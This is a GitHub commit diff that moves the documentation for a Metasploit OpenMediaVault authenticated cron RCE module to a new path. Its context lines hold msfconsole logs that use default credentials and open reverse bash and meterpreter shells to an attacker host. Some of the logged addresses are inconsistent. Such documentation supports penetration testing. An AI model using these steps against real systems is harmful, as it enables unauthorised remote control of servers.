Skip to content

Commit a9f8475

Browse files
committed
moved module + doc to exploit/unix/webapp
1 parent 198f3f8 commit a9f8475

File tree

2 files changed

+18
-18
lines changed

2 files changed

+18
-18
lines changed

documentation/modules/exploit/multi/http/openmediavault_auth_cron_rce.md renamed to documentation/modules/exploit/unix/webapp/openmediavault_auth_cron_rce.rb

Lines changed: 18 additions & 18 deletions
Original file line numberDiff line numberDiff line change
@@ -44,7 +44,7 @@
4444

4545
## Verification Steps
4646
- [ ] Start `msfconsole`
47-
- [ ] `use exploit/multi/http/openmediavault_auth_cron_rce`
47+
- [ ] `use exploit/unix/webapp/openmediavault_auth_cron_rce`
4848
- [ ] `set rhosts <ip-target>`
4949
- [ ] `set rport <port>`
5050
- [ ] `set lhost <attacker-ip>`
@@ -66,10 +66,10 @@
6666

6767
## Scenarios
6868
```msf
69-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > info
69+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > info
7070

7171
Name: OpenMediaVault rpc.php Authenticated Cron Remote Code Execution
72-
Module: exploit/multi/http/openmediavault_auth_cron_rce
72+
Module: exploit/unix/webapp/openmediavault_auth_cron_rce
7373
Platform: Unix, Linux
7474
Arch: cmd, x86, x64, armle, aarch64
7575
Privileged: Yes
@@ -143,16 +143,16 @@
143143
```
144144
### openmediavault_7.0-32-amd64.iso appliance Unix command - cmd/unix/reverse_bash
145145
```msf
146-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6
146+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.201.6
147147
rhosts => 192.168.201.6
148-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.201.8
148+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.201.8
149149
lhost => 192.168.201.8
150-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > check
150+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > check
151151
152152
[*] 192.168.201.6:80 - Authenticating with OpenMediaVault using credentials admin:openmediavault
153153
[*] Trying to detect if target is running a vulnerable version of OpenMediaVault.
154154
[+] 192.168.201.6:80 - The target is vulnerable. Version 7.0.pre.32
155-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
155+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
156156
157157
[*] Started reverse TCP handler on 192.168.201.8:4444
158158
[*] Running automatic check ("set AutoCheck false" to disable)
@@ -172,9 +172,9 @@
172172
```
173173
### openmediavault_7.0-32-amd64.iso appliance Linux Dropper - linux/x64/meterpreter/reverse_tcp
174174
```msf
175-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1
175+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1
176176
target => 1
177-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
177+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
178178
179179
[*] Started reverse TCP handler on 192.168.201.8:4444
180180
[*] Running automatic check ("set AutoCheck false" to disable)
@@ -204,13 +204,13 @@
204204
```
205205
### openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Unix command - cmd/unix/reverse_bash
206206
```msf
207-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 0
207+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 0
208208
target => 0
209-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
209+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
210210
rhosts => 192.168.1.10
211-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
211+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
212212
lhost => 192.168.1.8
213-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
213+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
214214
215215
[*] Started reverse TCP handler on 192.168.201.8:4444
216216
[*] Running automatic check ("set AutoCheck false" to disable)
@@ -229,15 +229,15 @@
229229
```
230230
### openmediavault 7.3.0-5 ARM64 Raspberry PI-4 Linux Dropper - linux/aarch64/meterpreter_reverse_tcp
231231
```msf
232-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set target 1
232+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set target 1
233233
target => 1
234-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
234+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set rhosts 192.168.1.10
235235
rhosts => 192.168.1.10
236-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
236+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > set lhost 192.168.1.8
237237
lhost => 192.168.1.8
238-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
238+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
239239
240-
msf6 exploit(multi/http/openmediavault_auth_cron_rce) > exploit
240+
msf6 exploit(unix/webapp/openmediavault_auth_cron_rce) > exploit
241241
242242
[*] Started reverse TCP handler on 192.168.201.8:4444
243243
[*] Running automatic check ("set AutoCheck false" to disable)

0 commit comments

Comments
 (0)